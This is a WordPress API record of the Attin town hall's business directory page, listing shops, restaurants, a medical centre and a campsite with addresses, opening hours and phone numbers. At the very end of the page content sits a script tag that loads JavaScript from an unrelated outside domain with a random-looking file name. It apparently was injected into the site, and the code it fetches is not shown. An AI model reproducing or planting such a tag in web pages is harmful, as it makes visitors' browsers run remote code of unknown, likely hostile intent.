{"id":53,"date":"2014-09-04T10:21:21","date_gmt":"2014-09-04T09:21:21","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?page_id=53"},"modified":"2020-06-12T15:04:30","modified_gmt":"2020-06-12T14:04:30","slug":"entreprises","status":"publish","type":"page","link":"https:\/\/www.attin-mairie.fr\/?page_id=53","title":{"rendered":"Entreprises"},"content":{"rendered":"<blockquote>\n<p style=\"text-align: center;\"><strong><em>les entreprises qui n&rsquo;apparaissent pas sur cette page et qui souhaitent y figurer sont invit\u00e9es \u00e0 contacter la mairie d&rsquo;Attin.<\/em><\/strong><\/p>\n<hr>\n<\/blockquote>\n<h2 style=\"text-align: center;\"><em><span style=\"text-decoration: underline;\"><strong>COMMERCES :<\/strong><\/span><\/em><\/h2>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>Centre E.Leclerc <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img fetchpriority=\"high\" decoding=\"async\" class=\"aligncenter size-medium wp-image-957\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9936-1-300x200.jpg\" alt=\"IMG_9936\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9936-1-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9936-1-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9936-1-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>&nbsp;Zone Commerciale,&nbsp;<\/strong><\/em><em><strong>Route Nationale 1<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Jeudi: <strong>9H00-19H30<\/strong>, Vendredi:<strong> 9H00-20H00<\/strong>, Samedi: <strong>9H00-19H30<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.81.35.25<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>ALDI March\u00e9 <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><img decoding=\"async\" class=\"aligncenter size-medium wp-image-958\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9959-1-300x200.jpg\" alt=\"IMG_9959\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9959-1-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9959-1-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9959-1-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><strong><em>RD 939<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Vendredi: <strong>8h30-19h30<\/strong>, Samedi: <strong>8h30-19h30<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em style=\"font-family: 'Open Sans Condensed', Helvetica, Arial, sans-serif; font-size: 20px; font-weight: bold;\"><strong>T\u00e9l\u00e9phone: 08.90.10.91.97<\/strong><\/em><\/p>\n<hr>\n<p>&nbsp;<\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>BAYARD Fils (Chauffage)<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><strong><img decoding=\"async\" class=\"aligncenter size-medium wp-image-961\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9978-1-300x200.jpg\" alt=\"IMG_9978\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9978-1-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9978-1-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9978-1-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><em>4 RD 901<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.86.08.13 \/ Fax: 03.21.81.48.50<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>Centre des Antiquaires <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-536\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9971-300x200.jpg\" alt=\"img_9971\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9971-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9971-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9971-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><em>4RD 939<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><em><strong>T\u00e9l\u00e9phone: 03.21.90.74.47<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><strong><em>Meubles FINDINIER<\/em> &nbsp;<\/strong><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-541\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9921-300x200.jpg\" alt=\"img_9921\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9921-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9921-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9921-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>43 Route d&rsquo;Etaples<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Lundi: <strong>9H00-12H00<\/strong>, Du Mardi au Samedi: <strong>9H00-12H00<\/strong> \/ <strong>14H00-19H00<\/strong>, Dimanche: Ferm\u00e9<\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.06.04.57<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>KANDY <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9932.jpg\" rel=\"attachment wp-att-542\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-542\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9932-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9932-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9932-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9932-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/strong><\/em><em><strong>Route Nationale 39, Zone Commerciale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Lundi: <strong>10H00-12H00<\/strong> \/ <strong>14H00-19H00<\/strong>, Du Mardi au Samedi: <strong>9H30-12H00<\/strong> \/ <strong>14H00-19H00<\/strong>, Dimanche: <strong>14H30-18H30<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.06.99.56<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>LITRIMARCHE <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9934.jpg\" rel=\"attachment wp-att-543\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-543\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9934-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9934-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9934-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9934-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>Route Nationale 39, Zone Commerciale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Mardi au Samedi: <strong>10H00-12H00<\/strong> \/ <strong>14H00-19H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.05.86.86<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>CHAUSS&rsquo;EXPO <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-547\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9960-300x200.jpg\" alt=\"img_9960\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9960-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9960-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9960-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>3 Rue d&rsquo;Etaples<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Samedi: <strong>9H30-12H00<\/strong> \/ <strong>14H00-19H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.05.86.86<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>GAMM&rsquo;VERT <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-546\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9957-300x200.jpg\" alt=\"img_9957\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9957-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9957-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9957-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>5 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Samedi: <strong>9H00-12H15<\/strong> \/ <strong>14H00-19H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.05.61.60<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>Mondial Pare-Brise <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-552\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9942-300x200.jpg\" alt=\"img_9942\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9942-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9942-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9942-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>Zone Industrielle<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Vendredi: <strong>8H30-12H00<\/strong> \/ <strong>13H30-17H30<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>Salon de Toilettage AB Chiens<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-560\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9977-e1481011901126-200x300.jpg\" alt=\"img_9977\" width=\"200\" height=\"300\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9977-e1481011901126-200x300.jpg 200w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9977-e1481011901126-768x1152.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9977-e1481011901126-683x1024.jpg 683w\" sizes=\"(max-width: 200px) 100vw, 200px\" \/>&nbsp;10 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Mardi au Vendredi: <strong>9H30-12H00<\/strong> \/ <strong>14H00-18H00<\/strong>, Samedi: <strong>9H30-12H30<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.05.30.71<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>WOODSHOP &nbsp;<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-561\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9982-300x200.jpg\" alt=\"img_9982\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9982-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9982-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9982-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Ouvert tous les jours <strong>10H30-12H30<\/strong> \/ <strong>14H30-19H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong>T\u00e9l\u00e9phone: 03.21.86.16.30<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><strong><em>R.L.S. LAV&rsquo; DOSE<\/em> &nbsp;<\/strong><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-590\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9980-300x200.jpg\" alt=\"img_9980\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9980-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9980-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9980-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>4 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.36.10.90<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>AUX TROIS POMMES D&rsquo;ORANGES (ruits et primeurs) &nbsp;<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-591\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9944-300x200.jpg\" alt=\"img_9944\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9944-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9944-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9944-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>Zone Industrielle<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.81.46.38<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><strong><em>AUTOSUR ( Contr\u00f4le Technique )<\/em> &nbsp;<\/strong><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-557\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9951-300x200.jpg\" alt=\"img_9951\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9951-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9951-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9951-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>39 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Vendredi:<strong> 8H00-12H30<\/strong> \/ <strong>13H30-18H30<\/strong>, Samedi: <strong>8H00-12H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong>T\u00e9l\u00e9phone: 03.21.86.33.85<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em>SIGN&rsquo;COM (Agence de publicit\u00e9)<\/em> &nbsp;<\/h3>\n<p style=\"text-align: center;\"><em><img loading=\"lazy\" decoding=\"async\" class=\"size-medium wp-image-1501 aligncenter\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0628-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0628-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0628-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0628-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><strong>65, Route Nationale 39<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Horaires: De <strong>8H00<\/strong> \u00e0 <strong>18H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong>T\u00e9l\u00e9phone: 03.21.06.57.07<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em>&nbsp;<strong>Mr Store<\/strong>&nbsp;<\/em><\/h3>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/uv.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\" wp-image-2159 aligncenter\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/uv.jpg\" alt=\"\" width=\"304\" height=\"228\"><\/a><\/p>\n<p style=\"text-align: center;\"><strong><em>10 Route nationale 39, Attin<\/em><\/strong><\/p>\n<p style=\"text-align: center;\"><em>Ouvert du Lundi au Jeudi de <strong>09H00 \u00e0 12h00<\/strong> et de <strong>14h00 \u00e0 18H30 <\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Le Vendredi de<strong> 09H00 \u00e0 12H00<\/strong>&nbsp;et de <strong>14H00 \u00e0 18H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Le Samedi de <strong>10H00 \u00e0 12H00<\/strong>&nbsp;et de <strong>14H00 \u00e0 18H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong>Ferm\u00e9<\/strong> le Dimanche<\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone : 03.66.15.00.96<\/em><\/strong><\/p>\n<hr>\n<h2 style=\"text-align: center;\"><em><span style=\"text-decoration: underline;\">RESTAURANTS ET BRASSERIES<\/span><\/em><\/h2>\n<hr>\n<h3 style=\"text-align: center;\"><em>&nbsp;&nbsp;<strong>BUONA PASTA (Restaurant &#8211; Pizzeria)<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0196.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-768\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0196-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0196-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0196-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_0196-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: center;\"><em>Ouvert tous les jours: <\/em><em><strong>11H30-14H30<\/strong> \/ <strong>18H30-22H30<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em><strong>T\u00e9l\u00e9phone: 03.61.22.94.24<\/strong><\/em><\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>Caf\u00e9 duMoulin &nbsp;<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-559\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9976-300x200.jpg\" alt=\"img_9976\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9976-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9976-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9976-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>12 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Du Lundi au Samedi: <strong>12H00-14H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.06.03.33<\/em><\/strong>&nbsp;<\/p>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>POM&rsquo;FRITES <\/strong><\/em><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-548\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9941-300x200.jpg\" alt=\"img_9941\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9941-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9941.jpg 500w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong>Zone Industrielle<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Lundi: Ferm\u00e9, Du Mardi au Vendredi: <strong>11H30-14H30<\/strong> \/ <strong>18H30-22H00<\/strong>, Samedi et Dimanche: <strong>12H00-15H00<\/strong> \/ <strong>18H30 &#8211; 22H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.90.95.17<\/em><\/strong><\/p>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>Restaurant Auberge du Bon Accueil&nbsp;<\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-539\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9918-300x200.jpg\" alt=\"img_9918\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9918-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9918-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9918-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>52 Route Nationale<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><em>Lundi: Ferm\u00e9, Du Mardi au Samedi: <strong>12H00-14H00<\/strong> \/ <strong>19H00-21H00<\/strong>, Dimanche: <strong>12H00-14H00<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.06.93.55<\/em><\/strong><\/p>\n<hr>\n<h2 style=\"text-align: center;\"><em>&nbsp;<span style=\"text-decoration: underline;\">MEDICAL:<\/span><\/em><\/h2>\n<hr>\n<h3 style=\"text-align: center;\"><em><strong>CAMSP (Centre d&rsquo;action m\u00e9dico-sociale pr\u00e9coce) <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-623\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2016\/12\/attin-r\u00e9alisations-009-300x200.jpg\" alt=\"attin-realisations-009\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2016\/12\/attin-r\u00e9alisations-009-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2016\/12\/attin-r\u00e9alisations-009-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2016\/12\/attin-r\u00e9alisations-009-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/>1 Rue Montchambrais<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.81.41.40<\/em><\/strong><\/p>\n<hr>\n<h2 style=\"text-align: center;\"><em><span style=\"text-decoration: underline;\">CAMPING:<\/span><\/em>&nbsp;<\/h2>\n<hr>\n<h3 style=\"text-align: center;\">&nbsp;<em><strong>Camping LES ETANGS FLEURIS <\/strong><\/em><\/h3>\n<p style=\"text-align: center;\"><em><strong><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9925.jpg\" rel=\"attachment wp-att-966\"><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter size-medium wp-image-966\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9925-300x200.jpg\" alt=\"IMG_9925\" width=\"300\" height=\"200\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9925-300x200.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9925-768x512.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2014\/09\/IMG_9925-1024x683.jpg 1024w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a>2 Rue de Canteraine<\/strong><\/em><\/p>\n<p style=\"text-align: center;\"><strong><em>T\u00e9l\u00e9phone: 03.21.06.01.01<\/em><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>les entreprises qui n&rsquo;apparaissent pas sur cette page et qui souhaitent y figurer sont invit\u00e9es \u00e0 contacter la mairie d&rsquo;Attin. COMMERCES : &nbsp;Centre E.Leclerc &nbsp;Zone Commerciale,&nbsp;Route Nationale 1 Du Lundi au Jeudi: 9H00-19H30, Vendredi: 9H00-20H00, Samedi: 9H00-19H30 T\u00e9l\u00e9phone: 03.21.81.35.25 &nbsp;ALDI March\u00e9 RD 939 Du Lundi au Vendredi: 8h30-19h30, Samedi: 8h30-19h30 T\u00e9l\u00e9phone: 08.90.10.91.97 &nbsp; &nbsp;BAYARD Fils [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":527,"parent":38,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-53","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/53","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=53"}],"version-history":[{"count":63,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/pages\/